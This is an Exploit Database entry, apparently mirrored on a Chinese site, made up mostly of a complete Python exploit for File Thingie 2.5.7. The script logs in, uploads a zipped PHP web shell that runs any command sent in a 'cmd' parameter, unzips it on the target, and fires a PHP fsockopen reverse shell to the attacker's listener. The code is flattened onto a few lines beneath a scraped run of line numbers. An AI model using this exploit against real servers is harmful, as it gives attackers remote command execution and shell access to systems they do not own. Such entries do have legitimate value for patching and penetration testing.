File Thingie 2.5.7 – Remote Code Execution (RCE)

• Exploit Database
• 149 阅读

• 作者： Maurice Fielenbach
  日期： 2023-05-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51436/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190

  #!/usr/bin/python   # Exploit Title: File Thingie 2.5.7 - Arbitary File Upload to RCE # Google Dork: N/A # Date: 27th of April, 2023 # Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt) # Software Link: https://github.com/leefish/filethingie # Version: 2.5.7 # Tested on: N/A # CVE: N/A   # Vulnerability originally discovered / published by Cakes # Reference: https://www.exploit-db.com/exploits/47349 # Run a local listener on your machine and you&apos;re good to go     import os import argparse import requests import random import string import zipfile from urllib.parse import urlsplit, urlunsplit, quote     class Exploit: def __init__(self, target, username, password, lhost, lport): self.target = target self.username = username self.password = password self.lhost = lhost self.lport = lport   def try_login(self) -> bool: self.session = requests.Session()   post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"} response = self.session.post(self.target, data=post_body)   if response.status_code == 404: print(f"[-] 404 Not Found - The requested resource {self.target} was not found") return False   elif response.status_code == 200:   if "Invalid username or password" in response.text: print(f"[-] Invalid username or password") return False   return True   def create_new_folder(self) -> bool: # Generate random string letters = string.ascii_letters self.payload_filename = "".join(random.choice(letters) for i in range(16)) headers = {"Content-Type": "application/x-www-form-urlencoded"} post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"}   print(f"[*] Creating new folder /{self.payload_filename}") response = self.session.post(self.target, headers=headers, data=post_body)   if f"index.php?dir=/{self.payload_filename}" in response.text: print(f"[+] Created new folder /{self.payload_filename}") return True   else: print(f"[-] Could not create new folder /{self.payload_filename}") return False   def create_payload(self) -> bool: try: with zipfile.ZipFile(f"{self.payload_filename}.zip", &apos;w&apos;, compression=zipfile.ZIP_DEFLATED) as zip_file: zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\&apos;cmd\&apos;])){ echo \"<pre>\"; $cmd = ($_REQUEST[\&apos;cmd\&apos;]); system($cmd); echo \"</pre>\"; die; }?>") print(f"[+] Zipped payload to {self.payload_filename}.zip") return True except: print(f"[-] Could not zip payload to {self.payload_filename}.zip") return False   def upload_payload(self) -> bool: # Set up the HTTP headers and data for the request headers = { b&apos;Content-Type&apos;: b&apos;multipart/form-data; boundary=---------------------------grimlockx&apos; }   post_body = ( &apos;-----------------------------grimlockx\r\n&apos; &apos;Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n&apos; &apos;Content-Type: application/octet-stream\r\n\r\n&apos; )   post_body += ( &apos;\r\n-----------------------------grimlockx\r\n&apos; &apos;Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n&apos; &apos;2000000\r\n&apos; &apos;-----------------------------grimlockx\r\n&apos; f&apos;Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n&apos; &apos;Content-Type: application/zip\r\n\r\n&apos; )   # Read the zip file contents and append them to the data with open(f"{self.payload_filename}.zip", "rb") as f: post_body += &apos;&apos;.join(map(chr, f.read()))   post_body += ( &apos;\r\n-----------------------------grimlockx\r\n&apos; &apos;Content-Disposition: form-data; name="act"\r\n\r\n&apos; &apos;upload\r\n&apos; &apos;-----------------------------grimlockx\r\n&apos; &apos;Content-Disposition: form-data; name="dir"\r\n\r\n&apos; f&apos;/{self.payload_filename}\r\n&apos; &apos;-----------------------------grimlockx\r\n&apos; &apos;Content-Disposition: form-data; name="submit"\r\n\r\n&apos; &apos;Upload\r\n&apos; &apos;-----------------------------grimlockx--\r\n&apos; )   print("[*] Uploading payload to the target")   response = self.session.post(self.target, headers=headers, data=post_body)   if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text: print("[+] Uploading payload successful") return True   else: print("[-] Uploading payload failed") return False   def get_base_url(self) -> str: url_parts = urlsplit(self.target) path_parts = url_parts.path.split(&apos;/&apos;) path_parts.pop() base_url = urlunsplit((url_parts.scheme, url_parts.netloc, &apos;/&apos;.join(path_parts), "", "")) return base_url   def unzip_payload(self) -> bool: print("[*] Unzipping payload") headers = {"Content-Type": "application/x-www-form-urlencoded"} post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"} response = self.session.post(f"{self.target}", headers=headers, data=post_body)   if f"<p class=&apos;ok&apos;>{self.payload_filename}.zip unzipped.</p>" in response.text: print("[+] Unzipping payload successful") print(f"[+] You can now execute commands by browsing {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>") return True   else: print("[-] Unzipping payload failed") return False   def execute_payload(self) -> bool: print("[*] Trying to get a reverse shell")   cmd = quote(f"php -r \&apos;$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\&apos;") print("[*] Executing payload")   response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}") print("[+] Exploit complete")   return True   def cleanup_local_files(self) -> bool: if os.path.exists(f"{self.payload_filename}.zip"): os.remove(f"{self.payload_filename}.zip") print("[+] Cleaned up zipped payload on local machine") return True   print("[-] Could not clean up zipped payload on local machine") return False     if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php") parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username") parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password") parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip") parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port") args = parser.parse_args()   exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport) exploit.try_login() exploit.create_new_folder() exploit.create_payload() exploit.upload_payload() exploit.unzip_payload() exploit.execute_payload() exploit.cleanup_local_files()